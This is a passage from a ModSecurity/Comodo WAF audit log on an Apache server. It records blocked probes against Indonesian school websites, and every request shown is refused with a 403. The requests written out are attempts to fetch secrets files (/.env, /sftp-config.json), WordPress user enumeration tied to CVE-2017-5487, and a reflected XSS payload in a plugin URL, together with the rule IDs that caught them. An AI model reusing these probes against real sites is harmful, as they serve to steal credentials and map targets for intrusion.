[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243110337 963 (- - -) Stopwatch2: 1748742243110337 963; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ce3d328-Z-- --37d1ec0c-A-- [01/Jun/2025:08:44:03 +0700] aDuwYwQ4kZQGAOBHoB5DEQAAAMk 103.236.140.4 32812 103.236.140.4 8181 --37d1ec0c-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --37d1ec0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37d1ec0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243122029 688 (- - -) Stopwatch2: 1748742243122029 688; combined=272, p1=244, p2=0, p3=0, p4=0, p5=28, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37d1ec0c-Z-- --2c639f6c-A-- [01/Jun/2025:08:44:03 +0700] aDuwY-4LjVe0Eerk_ZaIhgAAAEE 103.236.140.4 32814 103.236.140.4 8181 --2c639f6c-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --2c639f6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c639f6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243122241 662 (- - -) Stopwatch2: 1748742243122241 662; combined=232, p1=199, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c639f6c-Z-- --0c072472-A-- [01/Jun/2025:09:04:26 +0700] aDu1KkaTRmdfB-FaJjm6AgAAAAg 103.236.140.4 33330 103.236.140.4 8181 --0c072472-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c072472-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c072472-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748743466144896 2809 (- - -) Stopwatch2: 1748743466144896 2809; combined=1238, p1=440, p2=768, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c072472-Z-- --eaa0ee38-A-- [01/Jun/2025:09:04:28 +0700] aDu1LEaTRmdfB-FaJjm6BAAAAAs 103.236.140.4 33334 103.236.140.4 8181 --eaa0ee38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eaa0ee38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaa0ee38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748743468591540 2151 (- - -) Stopwatch2: 1748743468591540 2151; combined=1047, p1=391, p2=631, p3=0, p4=0, p5=25, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaa0ee38-Z-- --89e54165-A-- [01/Jun/2025:09:07:34 +0700] aDu15kaTRmdfB-FaJjm6EwAAAAg 103.236.140.4 33492 103.236.140.4 8181 --89e54165-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Accept-Charset: utf-8 --89e54165-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89e54165-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748743654866038 773 (- - -) Stopwatch2: 1748743654866038 773; combined=328, p1=287, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89e54165-Z-- --b903a435-A-- [01/Jun/2025:09:30:11 +0700] aDu7M-4LjVe0Eerk_ZaJMAAAAEQ 103.236.140.4 34092 103.236.140.4 8181 --b903a435-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.204.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.204.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b903a435-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b903a435-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748745011989457 3534 (- - -) Stopwatch2: 1748745011989457 3534; combined=1536, p1=555, p2=950, p3=0, p4=0, p5=31, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b903a435-Z-- --5128ed4d-A-- [01/Jun/2025:09:53:36 +0700] aDvAsEaTRmdfB-FaJjm6QQAAABI 103.236.140.4 34652 103.236.140.4 8181 --5128ed4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.53.19.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.53.19.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5128ed4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5128ed4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748746416298141 3250 (- - -) Stopwatch2: 1748746416298141 3250; combined=1477, p1=571, p2=877, p3=0, p4=0, p5=29, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5128ed4d-Z-- --2b5c8019-A-- [01/Jun/2025:10:03:28 +0700] aDvDAAQHT18O7PnXxsQJJAAAAJA 103.236.140.4 34950 103.236.140.4 8181 --2b5c8019-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.42.255.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.42.255.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2b5c8019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b5c8019-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748747008256270 3126 (- - -) Stopwatch2: 1748747008256270 3126; combined=1353, p1=495, p2=828, p3=0, p4=0, p5=30, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b5c8019-Z-- --d7846112-A-- [01/Jun/2025:10:45:18 +0700] aDvMzgQHT18O7PnXxsQJXgAAAIo 103.236.140.4 35852 103.236.140.4 8181 --d7846112-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.242.89.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.242.89.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d7846112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7846112-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748749518734675 2555 (- - -) Stopwatch2: 1748749518734675 2555; combined=1253, p1=413, p2=812, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7846112-Z-- --e573a05b-A-- [01/Jun/2025:10:46:46 +0700] aDvNJgQ4kZQGAOBHoB5D7wAAAMs 103.236.140.4 35898 103.236.140.4 8181 --e573a05b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.239.129.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.239.129.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e573a05b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e573a05b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748749606772840 3052 (- - -) Stopwatch2: 1748749606772840 3052; combined=1362, p1=489, p2=838, p3=0, p4=0, p5=35, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e573a05b-Z-- --3176863e-A-- [01/Jun/2025:11:15:35 +0700] aDvT50aTRmdfB-FaJjnIvgAAABY 103.236.140.4 42334 103.236.140.4 8181 --3176863e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3176863e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3176863e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748751335666586 782 (- - -) Stopwatch2: 1748751335666586 782; combined=278, p1=238, p2=0, p3=0, p4=0, p5=40, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3176863e-Z-- --78bbdf4c-A-- [01/Jun/2025:11:28:27 +0700] aDvW60aTRmdfB-FaJjnNkQAAAAk 103.236.140.4 33878 103.236.140.4 8181 --78bbdf4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.102.128.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.102.128.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --78bbdf4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78bbdf4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748752107195580 2769 (- - -) Stopwatch2: 1748752107195580 2769; combined=1280, p1=432, p2=817, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78bbdf4c-Z-- --3c4c6b7e-A-- [01/Jun/2025:11:46:10 +0700] aDvbEgQ4kZQGAOBHoB5jUgAAAMU 103.236.140.4 34258 103.236.140.4 8181 --3c4c6b7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.236.205 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.236.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3c4c6b7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c4c6b7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748753170146770 868 (- - -) Stopwatch2: 1748753170146770 868; combined=345, p1=304, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c4c6b7e-Z-- --81ed366b-A-- [01/Jun/2025:12:06:38 +0700] aDvf3u4LjVe0Eerk_ZadXwAAAFM 103.236.140.4 34610 103.236.140.4 8181 --81ed366b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81ed366b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81ed366b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748754398605545 3704 (- - -) Stopwatch2: 1748754398605545 3704; combined=1652, p1=613, p2=990, p3=0, p4=0, p5=48, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81ed366b-Z-- --53f04671-A-- [01/Jun/2025:12:12:26 +0700] aDvhOgQHT18O7PnXxsQd6wAAAJM 103.236.140.4 34694 103.236.140.4 8181 --53f04671-B-- GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169362674 --53f04671-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --53f04671-E-- --53f04671-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748754746461487 4229 (- - -) Stopwatch2: 1748754746461487 4229; combined=2317, p1=523, p2=1760, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53f04671-Z-- --86681659-A-- [01/Jun/2025:12:31:02 +0700] aDvllgQ4kZQGAOBHoB5jbgAAAM8 103.236.140.4 34832 103.236.140.4 8181 --86681659-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 180.193.178.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 180.193.178.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86681659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86681659-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748755862887161 3572 (- - -) Stopwatch2: 1748755862887161 3572; combined=1465, p1=479, p2=953, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86681659-Z-- --d33f7e17-A-- [01/Jun/2025:12:42:35 +0700] aDvoSwQHT18O7PnXxsQeBQAAAIQ 103.236.140.4 34892 103.236.140.4 8181 --d33f7e17-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.195.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.195.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d33f7e17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d33f7e17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748756555215296 3600 (- - -) Stopwatch2: 1748756555215296 3600; combined=1538, p1=491, p2=1010, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d33f7e17-Z-- --a737a06e-A-- [01/Jun/2025:12:58:39 +0700] aDvsDwQ4kZQGAOBHoB5jfwAAAME 103.236.140.4 35012 103.236.140.4 8181 --a737a06e-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 165.227.84.14 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a737a06e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a737a06e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev 